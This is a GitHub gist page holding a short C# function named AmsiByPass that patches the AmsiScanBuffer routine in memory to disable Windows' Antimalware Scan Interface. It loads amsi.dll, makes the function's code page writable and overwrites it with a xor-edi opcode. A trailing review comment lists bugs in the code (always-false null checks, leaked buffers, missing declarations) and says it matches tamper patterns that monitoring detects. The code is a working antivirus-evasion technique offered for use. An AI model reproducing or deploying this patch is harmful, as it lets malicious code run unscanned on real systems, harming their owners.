
@HopHouse
Created April 22, 2020 16:31

Revisions

  1. HopHouse created this gist Apr 22, 2020.
    28 changes: 28 additions & 0 deletions AmsiByPass.cs
    @@ -0,0 +1,28 @@
    public static string run()
    {
    IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll
    if (dllHandle == null) return "error";

    //Get the AmsiScanBuffer function address
    IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer");
    if (AmsiScanbufferAddr == null) return "error";

    IntPtr OldProtection = Marshal.AllocHGlobal(4); //pointer to store the current AmsiScanBuffer memory protection

    //Pointer changing the AmsiScanBuffer memory protection from readable only to writeable (0x40)
    bool VirtualProtectRc = VirtualProtect(AmsiScanbufferAddr, 0x0015, 0x40, OldProtection);
    if (VirtualProtectRc == false) return "error";

    //The new patch opcode
    var patch = new byte[] {0x31,0xff,0x90};

    //Setting a pointer to the patch opcode array (unmanagedPointer)
    IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
    Marshal.Copy(patch, 0, unmanagedPointer,3);

    //Patching the relevant line (the line which submits the rd8 to the edi register) with the xor edi,edi opcode
    MoveMemory(AmsiScanbufferAddr + 0x001b, unmanagedPointer, 3);

    return "OK";

    }
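Review bot: The two guards `if (dllHandle == null)` and `if (AmsiScanbufferAddr == null)` can never be true, because IntPtr is a struct and the comparison against null is always false (compiler warning CS0472), so a failed LoadLibrary or GetProcAddress falls through to the VirtualProtect call instead of returning "error"; the intended check is `if (dllHandle == IntPtr.Zero) return "error";` and likewise `if (AmsiScanbufferAddr == IntPtr.Zero) return "error";`. The two Marshal.AllocHGlobal buffers are never released with Marshal.FreeHGlobal, and OldProtection is allocated but its value is never read back or restored, so the exported code page of amsi.dll is left writable after the call. From a defensive standpoint, changing the protection of a system DLL's code page in-process and writing into it is exactly the tamper pattern that integrity checks and endpoint monitoring look for; a header comment should state that this function permanently modifies process memory of a loaded system library. The P/Invoke declarations for LoadLibrary, GetProcAddress, VirtualProtect and MoveMemory are not part of this file, so it does not compile on its own.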